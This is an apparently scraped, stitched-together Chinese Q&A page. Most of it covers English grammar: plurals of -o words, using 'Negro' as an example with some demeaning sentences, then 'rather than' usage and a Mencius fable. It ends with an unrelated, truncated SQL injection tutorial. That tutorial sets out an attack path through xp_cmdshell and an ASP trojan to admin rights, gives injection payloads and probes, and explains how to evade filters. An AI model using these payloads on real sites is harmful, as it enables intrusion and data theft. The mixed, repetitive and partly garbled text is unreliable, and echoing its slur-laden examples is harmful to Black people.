negro怎么读

negro复数negroes； negro：n.黑人；例如：A Study of the Negro Problem Neglected during the Progressive Movement . 扩展资料 　　Sounds like we got a Negro deep throat here. right? 　　听起来有个黑人进入我们的喉咙了。对吗？ 　　I haven"t ever seen any Negro changing any lines. 　　我没有看到任何黑人变换任何的路线。 　　Oh, please! Just save me the Negro rights! 　　噢，求你了。别给我说什么黑人的权利了！

negro的复数是Negroes,一般名词变复数以o结尾的名词,有生命的以o结尾的名词变复数时,词尾加 es,无生命的以o结尾的名词变复数时,词尾加s。 Negro的解释 a. 黑人的 n. 黑人 Negro的例句 It"s impolite to call the black people Negros. 称呼黑人为Negro是不礼貌的。 The Negro prisoner was forced to wear a ball and chain attached to one of his ankles. 那个黑人囚犯被迫在一只脚上带上了系有铁球的脚链。 罗马不是一日建成的。单词背诵需要大家使用正确的方法以及持之以恒的努力。希望17的小伙伴们在自己的努力下，顺利的拿下5500考研词汇，为将来的进一步学习打下夯实的基础。

black（s）negro（s）有歧视意味

Negroes n. 黑人（Negro的复数形式） Negroes and heroes eat tomatoes and potatoes. 黑人和英雄吃土豆和西红柿。 供参考，O(∩_∩)O~

Negroesn.黑人（Negro的复数形式）Negroesandheroeseattomatoesandpotatoes.黑人和英雄吃土豆和西红柿。供参考，O(∩_∩)O~

英语中以o结尾的单词复数形式加es的大概只有有限的几个，下面来给大家介绍一下这几个单词。 hero，英雄的意思，它的复数形式是要加es的，复数为heroes. tomato，西红柿的意思，复数形式也是要加es的，复数为tomatoes. Negro,黑人的意思，复数形式加es,复数为Negroes potato,土豆的意思，复数形式加es,复数为potatoes

heroesNegroesmiceSwiss

potatoes; mangos; children; cans; Negroes; sees

那个复数形式+es的是哪个？

记住这个口诀就OK了英雄(hero)吃土豆(potato)，黑人(Negro)吃蕃茄(tomato)。(+es)小偷(thief)的妻子(wife)用刀(knife)把狼(wolf)活生生(life)砍成了几半(half)，然后用树叶(leaf)将其盖在书架(shelf)后面。(+ves)

rabio的复数形式是rabios

　　英语单词复数形式变形规律总结1 　　一、变内部元音 　　foot-feet 　　man-men 　　mouse-mice 　　tooth-teeth 　　woman-women 　　二、词尾加-en 　　child-children 　　ox-oxen 　　三、形式不变,即单复数同型(通形名词) 　　deer-deer 　　fish-fish 　　means-means 　　series-series 　　sheep-sheep 　　四、加-es(是加-s的"特殊情况) 　　match-matches 　　tomato-tomatoes 　　五、去y改i加-es或去f改v加-es(亦为加-s的特殊情况) 　　leaf-leaves 　　六、外来词的不规则变形 　　ovum-ova 　　locus-loci 　　basis-bases 　　(不少外来词有两种复数形式) 　　focus-foci/focuses 　　cactus-cacti/cactuses 　　fungus-fungi/funguses 　　英语单词复数形式变形规律总结2 　　规则 变形 ： 　　1)一般情况下(大多数)词尾加s: 　　book→ books 　　pen → pens 　　bag → bags 　　teacher→ teachers 　　parent→ parents 　　tree→ trees 　　2)名词以s, x, sh, ch结尾时，(为了发音清晰)加es: 　　kiss→kisses 　　tax→ taxes(税) 　　brush→ brushes 　　lass→lasses(小姑娘) 　　box→ boxes 　　wish→ wishes 　　peach→ peaches 　　match→ matches 　　3)以o结尾的名词有些加es,有些加s: 　　tomato→ tomatoes 　　potato→ potatoes 　　echo→ echoes(回音) 　　hero→ heroes(英雄) 　　Negro→ Negroes(黑人) 　　veto→ vetoes(否决) 　　但以两个o或者两个元音字母结尾时只加s(如果再加es，则有ooe三个元音连在一起，不太好念。英语中很少允许三个元音字母在一起)： 　　bamboos(竹) 　　radios 　　zoos 　　cuckoos(布谷鸟) 　　kangaroos(袋鼠) 　　studios(画室) 　　embryos(胚胎) 　　有些以o结尾的外来词只加s: 　　photos(照片) 　　solos(独唱 ) 　　pianos(钢琴 ) 　　kilos(千克 ) 　　memos(备忘录) 　　Filipions(菲律宾人) 　　Eskimos(爱斯基摩人) 　　有些加s或者es都可以： 　　motto(e)s(座佑铭) 　　cargo(e)s(货物) 　　volcano(e)s(火山) 　　buffalo(e)s(水牛) 　　banjo(e)s(班卓琴) 　　tornado(e)s(龙卷风) 　　4)以“辅音字母+y”结尾时，改y为i，再加es(便于发音清晰)： 　　city→ cities 　　country→ countries 　　county→ counties(县) 　　注意：“元音+y”结尾时不能改y，直接加s，因为如果改y为i, 整个词形和发音会产生很大影响： 　　√boy → boys 　　√toy → toys 　　√guy → guys 　　×box → bois 　　5)以f或者fe结尾的名词，多数变f为v再加es(为了发音清晰)： 　　wife→ wives 　　self→ selves 　　loaf→ loaves (面包片) 　　wolf→ wolves (狼) 　　thief→ thieves 　　knife→ knives 　　shelf→ shelves (书架) 　　half→ halves 　　leaf→ leaves 　　但是，“两个元音字母+f”结尾时只加s(不能再变f为浊音v再加es,那样听起来会太硬)： 　　roof → roofs(屋顶) 　　proof → proofs(证据) 　　chief → chiefs(首领) 　　hoof → hoofs(马蹄) 　　个别词两种形式都可以： 　　scarf→ scarfs, scarves(围巾) 　　dwarf→ dwarfs, dwarves(矮人) 　　handkerchief→ handkerchiefs, handkerchieves(手巾)

http://wenku.baidu.com/view/380094ec5ef7ba0d4a733b93.html

可数名词以o结尾的，只有heor,negro,tomato,potato+es变复数，其它加s

一般记住常用的黑人（Negro）英雄（hero）坐在火山（volcano）口上吃西红柿（tomato）和土豆(potato)加es其余的加s

negroes 黑人(negro)英雄(hero)爱吃土豆(potato)和西红柿(tomato) 都加-es

Negroes

negro 黑人复数negroes。黑人英雄，土豆马铃薯，这是四个加-es以o结尾的名词。

negro的复数加es黑人 英雄 （爱吃） 土豆 和 西红柿negro hero potato tomato 都加es 其余加s

英语中以o结尾的单词复数形式加es的大概只有有限的几个，下面来给大家介绍一下这几个单词。 01 hero，英雄的意思，它的复数形式是要加es的，复数为heroes. 02 tomato，西红柿的意思，复数形式也是要加es的，复数为tomatoes. 03 Negro,黑人的意思，复数形式加es,复数为Negroes 04 potato,土豆的意思，复数形式加es,复数为potatoes

1.直接加s。2.以s,sh,ch,x结尾的单词要加es。3.以辅音字母加上y结尾的单词,去掉y加上ies.4.以o结尾的名词，变复数时，大多数都是直接加s,除了hero,negro,potato,tamato这四个加es.5.以f或fe结尾的名词变复数时,可以是加s，如：belief-beliefs，roof-roofs;也有去f,fe加ves，如half-halves,knife-knives,leaf-leaves,wolf-wolves,wife-wives,thief-thieves.此外。还有一些不规则变化。对于像man结尾的词：man→men一些以man,woman结尾的合成词，构成复数时与man的变化形式相同，如：policeman→policemen警察但是human(人)，German(德国人)不是合成词，其复数不能仿man的变化规律，而是按规则变化，即用humans,Germans。另外，当man用于名词前作定语时，若其后被修饰的名词为复数，则man也要用复数：mannurse→mennurses男护士希望对你有帮助！

以o结尾的,有时加es,有时加s.有生命的（动植物）加es,无生命的加s.For example:potato(土豆),tomato（西红柿）,hero（英雄）,Negro（黑人）,等等这些有生命的加es；photo (照片),piano（钢琴）,radio（收音机）,zoo（动物园）,kilo（公斤）等等无生命的加s,另附一个例外kangaroos （1）英雄和黑人吃土豆和西红柿（下划线词变复数加es） （2）小公斤边弹钢琴边广播,还到动物园看袋鼠.（下划线词的复数加s） 张道真先生编的《实用英语语法》中写道：“以o结尾的词多数都加es,但下面两类只加s”： （1）词末为两个元音字母的词 （2）某些外来词 这样,凡外来词则加 s．如 photos,solos,pianos,kilos（千克）,tohaccos.凡词尾以两个元音结尾的词则加 s．如：zoos,bamboos,coos,radios,studios（艺术家的工作室）. 除此而外,其他的都加 es,如 echoes（回声）,torpedoes（鱼雷）.

1.直接加s。2.以s,sh,ch,x结尾的单词要加es。3.以辅音字母加上y结尾的单词,去掉y加上ies.4.以o结尾的名词，变复数时，大多数都是直接加s,除了hero,negro,potato,tamato这四个加es.5.以f或fe结尾的名词变复数时,可以是加s，如：belief-beliefs，roof-roofs;也有去f,fe加ves，如half-halves,knife-knives,leaf-leaves,wolf-wolves,wife-wives,thief-thieves.此外。还有一些不规则变化。对于像man结尾的词：man→men一些以man,woman结尾的合成词，构成复数时与man的变化形式相同，如：policeman→policemen警察但是human(人)，German(德国人)不是合成词，其复数不能仿man的变化规律，而是按规则变化，即用humans,Germans。另外，当man用于名词前作定语时，若其后被修饰的名词为复数，则man也要用复数：mannurse→mennurses男护士希望对你有帮助！

土豆的拼写应该是potato

以o结尾的名词分为两类：有生命和没生命的。有生命的，如tomato,potato,negro,hero,mango等，他们的复数要加es。而没生命的，如zoo,photo,radio,vedio等，只要加s即可。还有些含有oo的词，变复数时将oo变为ee比如说，goose{鹅}---geese，foot{脚}---feet,tooth{牙齿}---teeth等。

1.直接加s。2.以s,sh,ch,x结尾的单词要加es。3.以辅音字母加上y结尾的单词,去掉y加上ies.4.以o结尾的名词，变复数时，大多数都是直接加s,除了hero,negro,potato,tamato这四个加es.5.以f或fe结尾的名词变复数时,可以是加s，如：belief-beliefs，roof-roofs;也有去f,fe加ves，如half-halves,knife-knives,leaf-leaves,wolf-wolves,wife-wives,thief-thieves.此外。还有一些不规则变化。对于像man结尾的词：man→men一些以man,woman结尾的合成词，构成复数时与man的变化形式相同，如：policeman→policemen警察但是human(人)，German(德国人)不是合成词，其复数不能仿man的变化规律，而是按规则变化，即用humans,Germans。另外，当man用于名词前作定语时，若其后被修饰的名词为复数，则man也要用复数：mannurse→mennurses男护士希望对你有帮助！

1.直接加s。2.以s,sh,ch,x结尾的单词要加es。3.以辅音字母加上y结尾的单词,去掉y加上ies.4.以o结尾的名词，变复数时，大多数都是直接加s,除了hero,negro,potato,tamato这四个加es.5.以f或fe结尾的名词变复数时,可以是加s，如：belief-beliefs，roof-roofs;也有去f,fe加ves，如half-halves,knife-knives,leaf-leaves,wolf-wolves,wife-wives,thief-thieves.此外。还有一些不规则变化。对于像man结尾的词：man→men一些以man,woman结尾的合成词，构成复数时与man的变化形式相同，如：policeman→policemen警察但是human(人)，German(德国人)不是合成词，其复数不能仿man的变化规律，而是按规则变化，即用humans,Germans。另外，当man用于名词前作定语时，若其后被修饰的名词为复数，则man也要用复数：mannurse→mennurses男护士希望对你有帮助！

首先我觉得hearoes应该写作heroes是hero的复数形式（虽然这样的话整句话的意思比较怪异），negroes也是negro的复数形式，动词当让要用一般人称动词不加s如果主语是thehero那么动词加s应为市第三人称单数。另外，likedoing是固定搭配所以是eating

表示多于一个以上就可以用复数了呀。videos ，n. 磁带录像( video的名词复数 ); 录像磁带; 录像机; （指方法） 录像; [例句]We were watching videos with her.我们当时在和她一起看录像。[其他] 原型： video

以o结尾的名词分为两类：有生命和没生命的。有生命的，如tomato,potato,negro,hero,mango等，他们的复数要加es。而没生命的，如zoo,photo,radio,vedio等，只要加s即可。还有些含有oo的词，变复数时将 oo 变为 ee 比如说，goose{鹅}---geese， foot{脚}---feet,tooth{牙齿}---teeth等。

结尾是s,sh,ch,x的名词的复数要加上es，以字母o结尾的单词加上es

以辅音字母结尾的o要加es

连词：1.Ilikepeachesratherthanapples.【名词】2.Theshoesarecomfortableratherthanpretty.【形容词】3.Shetelephonedratherthanwrote.【动词】4.Weshouldhelphimratherthanheshouldhelpus.【两个句子】5.decidedtowriteratherthan(to)telephone【不定式】可见词性要求并不严就是这种并列的都可以“平等结构”名词、形容词、谓语动词、状语、非谓语动词、从句等都可这些是比较常用的所谓连词是连接东西的词可以是以上五种情况（还有更多）介词：用作介词时，也表示butnot它后面接代词、名词和动名词。Ratherthananewcar,heboughtacolortelevision.正如一般介词要后接动名词作宾语一样，ratherthan后也可接动名词作宾语具体怎么样你要看ratherthan两边的东西是否构成并列如果是则为连词否则是介词其实关于它做什么成分初中用不到甚至高中我觉得我们主要记住用法真的就够了参考资料：百度文库帮你查到的。觉得说得很好。供参考。

　　“五十步笑百步”本义是作战时后退了五十步的人嘲笑后退了百步的人，后用来比喻自己跟别人有同样的缺点或错误，以下是我整理的关于五十步笑百步告诉我们什么道理？，欢迎阅读与收藏。 　　原文是孟子解释“邻国之民不加少，寡人之民不加多”的原因，同是鱼肉乡民，只是多少的不同罢了，其本质是一样的。 　　而现实的启示可以有很多，各有各的思想，下面是我的几点想法 　　1、勿为梁惠王，梁惠王总是看到自己好的一面，而看不到自己缺点，特别从“王顾左右而言它”那篇最能体现出来，梁惠王自己虽然看不到自己的缺点，但是大家都是有目共睹的，“十目所视，十手所指，其严乎？”，很多事情大家都清楚，只是不想说明白罢了，所以，一定去发现自己的"不足，敢于面对，积极纠正。 　　2、五十步的可悲，五十步的人，想逃却怕罚怕讥，不逃又怕俘怕死，人生总是犹豫，总是在意，活不出自己，只能随着社会流逝，毫无特色可言，当看到别人不如他时，他会取笑别人，或者取笑那些正在努力的人，当他笑百步者的时候，他何尝又不是笑他自己呢？ 　　3、恶小反成善？ 　　4、当五十步为主流。 　　5、孟子说话的艺术。 　　逃了五十步和逃了一百步，虽然在数量上有区别，但在本质上是一样的——都是逃跑。意思指，看事物应当看到事物的本质与全局，不能只看表面和局部。

有些倒装句型的构成不是将动词前置,也不是将助动词前置(或加助动词),而是将特殊内容前置. “prefer to do…rather than do…”(宁愿做一…而不愿做…).就是这样一种,该句型可将“rather than do…”提到句首,从而构成特殊倒装句型.例如： Rather than ride on a crowded bus,he always prefers to ride a bicycle.

对于rather than doing 什么的 ，可能是楼主没有理解好，后面可以跟doing， 但是，比如 rather than being worried 就可以因为being worried 是动词短语

不要随意嘲笑别人明明自己也不是十全十美但是却瞧不起别人骄傲自满告诉我们做人要谦虚低调谨言慎行

rather than 翻译为“与其……还不如……”I would watch TV raather than listen to the music!与其去听歌我还不如去看电视

rather than 可作连词词组使用，连接两个并列成分，表示在两者中间进行选择，意为“是 A 而不是 B ”、“要 A 不要 B ”、“宁愿 A 而不愿 B ”等，后面可以接名词、代词、形容词、副词、动词和动词不定式等。 扩展资料 　　1. rather than作名词。例如： 　　He is a writer rather than a teacher. 　　与其说他是教师，不如说他是作家。 　　John，rather than his roommates，is to blame. 　　要受责备的是约翰，而不是他的室友们。 　　The job will take months rather than weeks. 　　完成这项工作需要几个月，而不是几个星期。 　　2. rather than作代词。例如： 　　You，rather than she，are my guest. 　　你是我的客人，而不是她。 　　We are to blame rather than they. 　　该受责备的是我们，而不是他们。 　　3. rather than作形容词。例如： 　　The colour seems green rather than blue. 　　这颜色似乎是绿的`，而不是蓝的。 　　It was made shorter rather than longer. 　　它被缩短了，而不是加长了。 　　These shoes are comfortable rather than pretty. 　　这些鞋子与其说漂亮，不如说舒服。 　　4. rather than作副词。例如： 　　The ship sank quickly rather than slowly. 　　船沉得很快，而不是很慢。 　　He usually gets up early rather than late. 　　他经常起得早，而不是起得晚。 　　5. rather than作动词。例如： 　　She left rather than stayed at home. 　　她不是呆在家里，而是走了。 　　Rather than cause trouble，he went away. 　　他宁可走开而不愿惹麻烦。 　　Rather than have the radio repaired，he"d like to buy a new one. 　　与其修理那部收音机，他想还不如买一部新的。 　　6. rather than作介词短语。例如： 　　I"d prefer to read in the library rather than at home. 　　我宁愿在图书馆看书，也不愿在家里看书。 　　I"d prefer to do it in this way rather than in that way. 　　我喜欢这样做，而不愿意那样做。 　　He went to the park in the evening rather than in the morning. 　　他喜欢晚上去公园，而不喜欢早上去。 　　7. rather than动词的- ing 形式。例如： 　　She likes dancing rather than singing. 　　她喜欢跳舞，而不喜欢唱歌。 　　It is snowing rather than raining outside. 　　外面在下雪，而不是在下雨。 　　She is laughing rather than crying. 　　她是在笑，而不是在哭。 　　8. rather than作过去分词。例如： 　　He had the house rebuilt rather than repaired. 　　他宁愿重建房子，而不愿修缮。 　　9. rather than句子。例如： 　　We should help him rather than he should help us. 　　我们应该帮助他，而不是他应该帮助我们。 　　It was what he meant rather than what he said. 　　那是指他话中的意思，而不是他所说的话。

　　下面是我整理的一些关于rather than的用法大全， 希望对大家有帮助。 　　rather than 可作连词词组使用，连接两个并列成分，表示在两者中间进行选择，意为“是 A 而不是 B ”、“要 A 不要 B ”、“宁愿 A 而不愿 B ”等，后面可以接名词、代词、形容词、副词、动词和动词不定式等。 　　1. rather than作名词。例如： 　　He is a writer rather than a teacher. 　　与其说他是教师，不如说他是作家。 　　John，rather than his roommates，is to blame. 　　要受责备的是约翰，而不是他的室友们。 　　The job will take months rather than weeks. 　　完成这项工作需要几个月，而不是几个星期。 　　2. rather than作代词。例如： 　　You，rather than she，are my guest. 　　你是我的客人，而不是她。 　　We are to blame rather than they. 　　该受责备的是我们，而不是他们。 　　3. rather than作形容词。例如： 　　The colour seems green rather than blue. 　　这颜色似乎是绿的，而不是蓝的。 　　It was made shorter rather than longer. 　　它被缩短了，而不是加长了。 　　These shoes are comfortable rather than pretty. 　　这些鞋子与其说漂亮，不如说舒服。 　　4. rather than作副词。例如： 　　The ship sank quickly rather than slowly. 　　船沉得很快，而不是很慢。 　　He usually gets up early rather than late. 　　他经常起得早，而不是起得晚。 　　5. rather than作动词。例如： 　　She left rather than stayed at home. 　　她不是呆在家里，而是走了。 　　Rather than cause trouble，he went away. 　　他宁可走开而不愿惹麻烦。 　　Rather than have the radio repaired，heu2019d like to buy a new one. 　　与其 修理 那部收音机，他想还不如买一部新的。 　　6. rather than作介词 短语 。例如： 　　Iu2019d prefer to read in the library rather than at home. 　　我宁愿在图书馆看书，也不愿在家里看书。 　　Iu2019d prefer to do it in this way rather than in that way. 　　我喜欢这样做，而不愿意那样做。 　　He went to the park in the evening rather than in the morning. 　　他喜欢晚上去公园，而不喜欢早上去。 　　7. rather than动词的- ing 形式。例如： 　　She likes dancing rather than singing. 　　她喜欢跳舞，而不喜欢 唱歌 。 　　It is snowing rather than raining outside. 　　外面在下雪，而不是在下雨。 　　She is laughing rather than crying. 　　她是在笑，而不是在哭。 　　8. rather than作过去分词。例如： 　　He had the house rebuilt rather than repaired. 　　他宁愿重建房子，而不愿修缮。 　　9. rather than 句子 。例如： 　　We should help him rather than he should help us. 　　我们应该帮助他，而不是他应该帮助我们。 　　It was what he meant rather than what he said. 　　那是指他话中的意思，而不是他所说的话。

rather than 是一个并列连词，用法比较复杂，现归纳如下： 1. rather than 与would 连用时，构成“would rather...than...”句式，意思是“宁愿……而不愿……”，表示主观愿望，即在两者之中选择其一。例如： She"d rather die than lose the children. 她宁愿死也不愿失去孩子们。 2. rather than 不与would连用时，表示客观事实，意为“是……而不是……；与其……不如……”。它连接的并列成分可以是名词、代词、形容词、介词(短语)、动名词、分句、不定式、动词等。现分述如下： (1) 连接两个名词或代词 He is an explorer rather than a sailor. 与其说他是一个海员，不如说他是一个探险者。 You rather than I are going to go camping. 是你而不是我要去要野营。 注意：rather than 连接两个名词或代词作主语时，谓语动词应与rather than 前面的名词或代词在人称和数上保持一致。 (2) 连接两个形容词 The sweater she bought was beautiful rather than cheap. 与其说她买的这件羊毛衫便宜不如说它漂亮。 (3) 连接两个介词(短语)或动名词 We will have the meeting in the classroom rather than in the great hall. 我们是在教室里开会，不是在大厅里。 She enjoys singing rather than dancing. 她喜欢唱歌，而不喜欢跳舞。 (4) 连接两个分句 We should help him rather than he should help us. 是我们应该帮助他而不是他应该帮助我们。 (5) 连接两个不定式 I decided to write rather than (to) telephone. 我决定写信而不打电话。 注意：rather than 后接不定式时，不定式可以带to，也可以不带to, 如上句。但rather than位于句首时，则只能接不带to 的不定式。如：Rather than allow the vegetables to go bad, he sold them at half price. 他唯恐蔬菜烂掉，把它们以半价卖掉了。 (6) 连接两个动词 He ran rather than walked. 他是跑来的，而不是走来的。 注意：这里rather than 后用了walked，而没有用walk，表示客观事实，而不是主观愿望。如果换成walk，则作“宁愿……而不愿 ……”解。 (文/王次平 孙玉峰; 英语辅导报冀教高一版 04~05学年度第20期；版权归英语辅导报社所有，独家网络合作伙伴新浪教育，未经许可，不得以任何形式进行转载。)

一、rather than用作连词,连接两个平行结构.既可以表示主观愿望上的决择,“与其…宁可…”,也可以表示客观程度上的差异,“与其说是…不如说是…”.例如：1、接代词1）I,rather than you,should do the work.该做这工作的是我,而不是你.2、接名词2）John ought to go rather than Jean.约翰比琴更应该去.3）I think I"ll have a cold drink rather than coffee.我想我该要一杯冷饮,而不要咖啡.试比较：4）We sometimes eat rice instead of potatoes.有时候我们不吃土豆,而吃米饭.3、接形容词5）These shoes are comfortable rather than for your friend.这鞋不好看可是舒服.6）You are doing this for yourself rather than for your friend.你不是为你朋友,而是为你自己做这种事.7)I"d prefer to go in August rather than in July.我愿8月去不愿7月去.5、接动名词8)I always prefer starting early,rather than leaving everything to the last minute,我总是愿意早开始而不愿意把所有事情都留到最后才做.9)He was engaged in writing a letter rather than reading the newspaper.他那时是在写信而不是看报纸.6、接过去分词10)She insisted on having the room papered rather than painted.她坚持要用纸裱糊房间,而不是把房间粉刷一下.7、接不定式11)I decided to write rather than telephone.我决定写信而不是打电话.12)They prefer to die fighting rather than live in enslavement.他们宁可战死,也不肯活着受奴役.13)I prefer to work rather than remain idle.我宁愿工作而不愿闲着.8、接谓语动词14)He told a lie rather than get his friend into trouble.他宁愿说谎也不愿连累朋友.15)Shall we go for a walk rather than watch television?咱们不看电视,出去散步,好不好?16)He ran rather than walked.他跑步而不是步行.rather than后接动词原形表示主观抉择,接一个动词的过去式则表示客观差异.9、接从句17)It was what he meant rather than what he said.那是指他话中的意思,而不是他所说的话.18)It was what he had caten rather than what he had drunk that made him ill.使他得病的不是他喝的东西,而是他吃的东西.二、rather than用作介词R.Quirk编著的《英语语法大全》p.1387明确指出：和as well as及in stead of一样,rather than后面跟一个和母句中的动词形式并不匹配的ing分词分句时,它是介词,而不是准并列连词：19）Their actions precipitated the war rather than averting it.他们的行为促使战争爆发而不是避免战争.20）Rather than a new car,he bought a colour television.他买了一台彩电,而不是一辆新车.21）Let"s finish the job today,rather than leaving it till tomorrow.让咱们今天干完工作,而不是留到明天.三、rather than用作从属连词,引导一种优选分句.R.Quirk在《英语语法大全》p.1540指出：优先分句主要用从属连词rather than和sooner than引导,用不带to的不定式作该分句的谓语动词：22）Rather than go there by air,I"d take the slowest train.我宁愿乘最慢的火车,也不愿乘飞机去那儿.

楼主理解有误。rather than是并列连词，并非介词，用于连接前后两个并列部分。这两个部分在性质上要求一致，比如都是名词/形容词/副词等。比如：I‘m (strong) rather than (weak). 都是形容词I don"t understand (how it is used) rather than (its meaning). 都是名词性成分而且如果其前后部分结构类似的话，则甚至会要求形式上完全一致。如前后都是不定式，都是动名词，都是动词过去分词，都是动名词等等。楼主这个例句中，rather than前后就是两个不定式短语，不过第二个不定式短语中的to可以省略。所以更常用的写法是：I prefer to stay at home rather than (省略to) go outside.至于成分上，to stay at home和(to) go outside做prefer的（并列）宾语。

五十步笑百步的道理是看事情与问题不能有局限性，需要纵观全局，对某一事物要进行理性的分析，找到其中规律，看清事物的本身才能更好的进行处理与解答。以五十步笑百步解释：作战时后退了五十步的人讥笑后退了百步的人。比喻自己跟别人有同样的缺点错误，只是程度上轻一些，却毫无自知之明地去讥笑别人。出处：《孟子·梁惠王上》：“填然鼓之，兵刃既接，弃甲曳兵而走，或百步而后止，或五十步而后止。以五十步笑百步，则何如？”逃了五十步和逃了一百步，虽然在数量上有区别，但在本质上是一样的——都是逃跑。梁惠王尽管给了百姓一点小恩小惠，但他发动战争，欺压黎民，在压榨人民这点上，跟别国的暴君没有本质的差别。历史典故梁惠王问孟子：“我对于国家，总算尽心了吧！河内年成不好，我就把河内的灾民移到河东去，把河东的粮食调到河内来。河东荒年的时候，我也同样设法救灾。看看邻国的君王还没有像我这样做的。可是，邻国的百姓并没有大量逃跑，我国的百姓也没有明显的增加，这是什么道理呢？”孟子回答说：“大王喜欢打仗，我就拿打仗作比方吧。战场上，战鼓一响，双方的士兵就刀对刀、枪对枪地打起来。打败的一方，丢盔卸甲，拖着刀枪，赶紧逃命。有一个人逃了一百步，另一个人逃了五十步。这时候，如果那个逃了五十步的竟嘲笑那个逃了一百步的胆小怕死，你说对不对？”梁惠王说：“当然不对。他只不过没有逃到一百步罢了，但同样也是逃跑啊！”孟子说：“大王既然懂得了这个道理，怎么能够希望你的百姓会比邻国的多呢？”

比如原文本是：aaabbbccc运行上面的子程序后结果：aaabbb要插入的文本ccc *********************************不知道你是不是要这种效果！

您好，ratherthandoing/n计科加doing还可以加n名次在这里因为前面的play用的是原型，所以后面的用do谢谢，希望对你有用

“五十步笑百步”的故事说明了看事物不能只看表面也不能只局限于别人，而要看其本质和全局。看大局才能更好地发现问题，从而进行改正。告诫我们要有自知之明以及要客观理性的看待自己的缺点问题等。“五十步笑百步”（拼音：wǔshíbùxiàobǎibù）是一则来源于寓言故事的复句成语，有关典故最早见于《孟子·梁惠王上》。“五十步笑百步”本义是作战时后退了五十步的人嘲笑后退了百步的人，后用来比喻自己跟别人有同样的缺点或错误，只是程度上轻一些，可是却讥笑别人。在句中作宾语、分句；含贬义。成语寓意：梁惠王对自己迁灾民和运粮救灾的“善政”很得意，然而在孟子看来，这只能说明他的做法比邻国国君好一点，因为这样做只是补救的措施，并没有从根本上使百姓富足起来。因此，魏国远没有像梁惠王以为的那样好，能够吸引别国的百姓蜂拥而至。梁惠王认为自己比其他国君更好，这样的认识和梁惠王自己所否定的五十步笑百步是很相似的。作战时，后退了五十步的人嘲笑后退了一百步的人，虽然数量不同、程度不同，但实质是一样的，都是逃跑。这则成语也讽刺了一种现象：某些人在对别人的痛疽溃疡讽怨呵责的时候，却对自己的毛病视若无睹，毫无觉悟，用“五十步笑百步”的做法为自己掩饰，有时候我们看到的只是令人眼花缭乱的事物表象，而藏在表象之后决定着事物本质的属性，往往容易被忽视。

SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。但是，SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据。据统计，网站用ASP+Access或SQLServer的占70%以上，PHP+MySQL占20%，其他的不足10%。在本文，以SQL-SERVER+ASP例说明SQL注入的原理、方法与过程。（PHP注入的文章由NB联盟的另一位朋友zwell撰写的有关文章）SQL注入攻击的总体思路是：l 发现SQL注入位置；l 判断后台数据库类型；l 确定XP_CMDSHELL可执行情况l 发现WEB虚拟目录l 上传ASP木马；l 得到管理员权限；一、SQL注入漏洞的判断一般来说，SQL注入一般存在于形如：HTTP://xxx.xxx.xxx/abc.asp?id=XX等带有参数的ASP动态网页中，有时一个动态网页中可能只有一个参数，有时可能有N个参数，有时是整型参数，有时是字符串型参数，不能一概而论。总之只要是带有参数的动态网页且此网页访问了数据库，那么就有可能存在SQL注入。如果ASP程序员没有安全意识，不进行必要的字符过滤，存在SQL注入的可能性就非常大。为了全面了解动态网页回答的信息，首选请调整IE的配置。把IE菜单-工具-Internet选项－高级－显示友好HTTP错误信息前面的勾去掉。为了把问题说明清楚，以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY为例进行分析，YY可能是整型，也有可能是字符串。1、整型参数的判断当输入的参数YY为整型时，通常abc.asp中SQL语句原貌大致如下：select * from 表名 where 字段=YY，所以可以用以下步骤测试SQL注入是否存在。①HTTP://xxx.xxx.xxx/abc.asp?p=YY"(附加一个单引号)，此时abc.ASP中的SQL语句变成了select * from 表名 where 字段=YY"，abc.asp运行异常；②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp运行正常，而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同；③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp运行异常；如果以上三步全面满足，abc.asp中一定存在SQL注入漏洞。2、字符串型参数的判断当输入的参数YY为字符串时，通常abc.asp中SQL语句原貌大致如下：select * from 表名 where 字段="YY"，所以可以用以下步骤测试SQL注入是否存在。①HTTP://xxx.xxx.xxx/abc.asp?p=YY"(附加一个单引号)，此时abc.ASP中的SQL语句变成了select * from 表名 where 字段=YY"，abc.asp运行异常；②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1"="1", abc.asp运行正常，而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同；③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1"="2", abc.asp运行异常；如果以上三步全面满足，abc.asp中一定存在SQL注入漏洞。3、特殊情况的处理有时ASP程序员会在程序员过滤掉单引号等字符，以防止SQL注入。此时可以用以下几种方法试一试。①大小定混合法：由于VBS并不区分大小写，而程序员在过滤时通常要么全部过滤大写字符串，要么全部过滤小写字符串，而大小写混合往往会被忽视。如用SelecT代替select,SELECT等；②UNICODE法：在IIS中，以UNICODE字符集实现国际化，我们完全可以IE中输入的字符串化成UNICODE字符串进行输入。如+ =%2B，空格=%20 等；URLEncode信息参见附件一；③ASCII码法：可以把输入的部分或全部字符全部用ASCII码代替，如U=chr(85),a=chr(97)等，ASCII信息参见附件二；二、区分数据库服务器类型一般来说，ACCESS与SQL－SERVER是最常用的数据库服务器，尽管它们都支持T－SQL标准，但还有不同之处，而且不同的数据库有不同的攻击方法，必须要区别对待。1、 利用数据库服务器的系统变量进行区分SQL－SERVER有user,db_name()等系统变量，利用这些系统值不仅可以判断SQL-SERVER，而且还可以得到大量有用信息。如：① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不仅可以判断是否是SQL-SERVER，而还可以得到当前连接到数据库的用户名②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不仅可以判断是否是SQL-SERVER，而还可以得到当前正在使用的数据库名；2、利用系统表ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限，而SQL-SERVER的系统表是sysobjects,在WEB环境下有访问权限。对于以下两条语句：①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0若数据库是SQL-SERVE，则第一条，abc.asp一定运行正常，第二条则异常；若是ACCESS则两条都会异常。3、 